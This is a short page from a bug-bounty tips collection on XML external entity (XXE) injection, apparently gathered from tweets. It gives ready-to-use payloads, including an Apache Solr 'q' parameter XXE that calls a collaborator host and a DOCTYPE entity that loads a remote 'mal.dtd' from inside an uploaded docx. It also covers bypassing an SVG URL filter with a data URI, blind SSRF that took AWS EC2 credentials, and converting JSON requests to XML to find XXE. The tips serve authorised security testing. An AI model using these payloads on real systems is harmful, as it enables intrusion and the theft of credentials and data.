XXE

​see an apache solr GET/POST to /select ? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty​
​#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) to grab an SVG? Try & bypass it by embedding the SVG using the Data URI protocol handler [data:image/svg+xml;base64,XXE_PAYLOAD], most of the time it would work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity​
​https://twitter.com/11xuxx/status/1250764273623629826​
​XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip​
​jobs.targ.com site fills in personal info by uploading cv & parsing. Accepted docx, pdf, etc. 1. Unzip docx & edit word/document.xml 3. Add <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;]> 3. Upload 4. Profit! #BugBounty​
​#BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension [email protected]_Suite to do achieve this!​
https://twitter.com/Kei0x/status/1172267556226445313
​XXE​
1.​change password func -> JSON​
2.​converted to XML -> 200 OK​
3.​created dtd file on my ec2 and started webserver on port 80​
4.​crafted a XXE payload!​
5.​bounty!​
​Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.​
Injection
Local / Remote File Inclusion
Last modified 2yr ago